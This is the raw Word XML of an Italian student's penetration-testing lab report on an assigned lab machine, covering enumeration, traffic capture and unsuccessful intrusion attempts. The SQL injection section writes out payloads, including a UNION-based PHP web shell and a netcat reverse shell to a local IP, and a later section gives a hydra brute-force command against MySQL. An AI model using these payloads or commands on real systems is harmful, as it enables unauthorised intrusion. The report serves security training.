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rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
          <w:b w:val="1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5rcxt5ryx3g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>
          <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
          <w:b w:val="1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jbpeaogutyjj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jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
          <w:b w:val="1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_j7s2jct9ey27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jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
          <w:b w:val="1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o9scsx8697hf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jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
          <w:color w:val="999999"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_smt2aylju3lt" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
          <w:b w:val="1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Report Prima Prova VAPT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
          <w:b w:val="1"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60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color w:val="999999"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">__________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:jc w:val="center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by Riccardo Bruzzese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2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Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppi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6ti59c3w9tuk">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppi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1.Obiettivi</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppi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_6ti59c3w9tuk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Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppi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kyxt4obry22">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppi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2.Enumeration</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppi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_akyxt4obry22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025.511811023624"/>
            </w:tabs>
            <w:spacing w:after="80" w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:firstLine="0"/>
            <w:rPr>
              <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins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ioh72q2z6y2">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins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Analisi del traffico</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins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_tioh72q2z6y2 \h </w:instrText>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins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5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rPr>
          <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6ti59c3w9tuk" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Obiettivi </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E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A ciascuno è stata assegnata una macchina di classe C (nel mio caso “172.20.212.84”) e con esso effettuare un Vulnerability Assessment ovvero trovare tutte le potenziali vulnerabilità e attraverso esse riuscire ad entrare all'interno della macchina.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F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rPr>
          <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_akyxt4obry22" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.Enumeration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="46609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Nell’ indirizzo a me assegnato 172.20.212.84 ci troviamo questo portale</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="22225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Al termine della sessione di login appare questa schermata</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065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La macchina a prima analisi dispone di servizi SSH (22) e HTTP (80)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2986195" cy="161448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6195" cy="1614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Analisi in base a Legion (Scanning Enumeration Open Source)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="32004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Attraverso l’enumeration scopriamo appunto che dispone di 2 CVE collegate all servizio Web Apache httpd 2.4.41</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4099653" cy="5253038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9653" cy="5253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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="50927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Analisi di Dirbuster utilizzando le wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dfjv32k3m2g4" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="47879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Attraverso DirBuster abbiamo trovato la cartella /uploads e attraverso esso troviamo 3 immagini.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075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Avendo queste informazioni ho effettuato un exiftool per ogni immagine in modo dopo di applicare un'analisi attraverso la steganografia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114300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731200" cy="4038600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapSquare wrapText="bothSides" distB="114300" distT="114300" distL="114300" distR="11430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4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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5610225" cy="5229225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22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Attraverso steghide ho provato ad ottenere più informazioni da queste 3 immagini con numerosi tentativi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5695950" cy="5362575"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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36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Effettuato Enumerazione attraverso metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089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creato una userlist presa da rockyou.gz estratta e poi eseguita con il comando &gt;run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="15875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Subito dopo ho provato a rovistare il file rev.php della cartella uploads (probabile reverse shell scritta in PHP presa da penterstermonkey)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000092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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1689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Successivamente ho lanciato il comando nikto per vedere se c’erano altre probabili vulnerabilità Web</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000097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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4471988" cy="4159988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4159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Analisi Nikto della macchina 172.20.212.84</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000099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Subito dopo aver effettuato l’analisi con nikto ho provato a controllare eventuali stati della macchina casomai ci fosse stato un firewall in mezzo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="5219700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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nel mentre che effettuavo l’analisi attraverso Dirbuster è stato rilevato del materiale accessibile tra cui </w:t>
      </w:r>
      <w:hyperlink r:id="rId20">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://172.20.212.84/system%20administrator/assets/img/portfolio/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D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2"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tioh72q2z6y2" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 Analisi del traffico </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009F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Effettuando numerose GET sulla rev.php ho deciso di effettuare dello spoofing del traffico quindi utilizzando strumenti come BurpSuite, tcpdump e Wireshark </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A1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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="40767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Analisi attraverso BurpSuite</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A4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Ho impostato al motore di ricerca Firefox il proxy 127.0.0.1 e la porta 8080 e nella voce Proxy ---&gt; Intercepter 0ff/0n</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A6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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="49911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Cattura dell TCPdump quando ho provato ad accedere al login.php </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AB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All’ interno del TCPdump ho effettuato l’ analisi quando c’era ancora Dirbuster che eseguiva le operazioni in caso trovasse altre risorse.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AC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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="32385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Cattura TCPdump dopo aver effettuato la get su rev.php </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE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2"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wuskptckzbtm" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 Tentativi tramite SQL Injections </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B0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Subito dopo l'analisi su rev.php attraverso rev.php ho provato numerosi tentativi tra SQL injection e provato ad effettuare LFI-RFI attack (Remote File Inclusion/Local File Inclusion) sulla pagina di login.php utilizzando gli utenti will,smith e bob </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4840837" cy="3690938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0837" cy="3690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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4876800" cy="382905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29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Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
          <w:i w:val="1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 Tentativo con  bob su Username e Password </w:t>
      </w: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1 ‘OR’ 1 ‘=’ 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins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Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins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Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
          <w:i w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5324475" cy="4886325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88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Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
          <w:i w:val="1"/>
        </w:rPr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Tentativo con will ' union select 1, '&lt;?php system($_GET["cmd"]); ?&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins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Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
          <w:i w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4162425" cy="314325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Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
          <w:i w:val="1"/>
        </w:rPr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 Tentativo con smith ' union select 1, ' nc 10.0.2.15 4466 -e /bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="4572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In modo da provare ad ottenere l’accesso attraverso quello </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C0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1"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yur6t4yrdk4p" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.Exploit di MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C3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Durante la prova è stato scoperto che nella porta 33060 era uscito il servizio di mysql molto probabilmente sapendo i nomi SSH e avendo qualche nome come will, bob e smith proverei con hydra ad effettuare un brute force </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C5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vi spiego il comando: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C8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hydra -s 33060 -L &lt;lista utenti in ssh&gt; -P &lt;wordlist esterna&gt; 172.20.212.84 mysql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C9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-s 33060 per la porta del servizio mentre su L inseriremo la lista degli utenti trovati ovvero will, bob e smith mentre invece su -P inseriremo la liste delle password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CB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1"/>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lo6mpkdo5feg" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4.Conclusioni</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CF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Non avendo il servizio mysql ho trovato il laboratorio molto complesso e difatti l’errore dont connect ha ostacolato molto l’esperienza VAPT ma nonostante ciò ho provato diverse tecniche SQL injection e stimolato nuove esperienze grazie a questa esperienza </w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId29" w:type="default"/>
      <w:footerReference r:id="rId30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 Extra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2">
    <w:pPr>
      <w:rPr>
        <w:color w:val="999999"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="999999"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">_________________________________________________________________________</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D3">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
        <w:color w:val="999999"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Poppins" w:cs="Poppins" w:eastAsia="Poppins" w:hAnsi="Poppins"/>
        <w:color w:val="999999"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">Riccardo Bruzzese</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D4">
    <w:pPr>
      <w:jc w:val="right"/>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Nunito ExtraLight" w:cs="Nunito ExtraLight" w:eastAsia="Nunito ExtraLight" w:hAnsi="Nunito ExtraLight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Nunito ExtraLight" w:cs="Nunito ExtraLight" w:eastAsia="Nunito ExtraLight" w:hAnsi="Nunito ExtraLight"/>
        <w:color w:val="999999"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve"> | Page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1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-457199</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-200024</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1347788" cy="831136"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapTopAndBottom distB="114300" distT="114300"/>
          <wp:docPr id="17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47788" cy="83113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172.20.212.84/system%20administrator/assets/img/portfolio/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10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17.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId12" 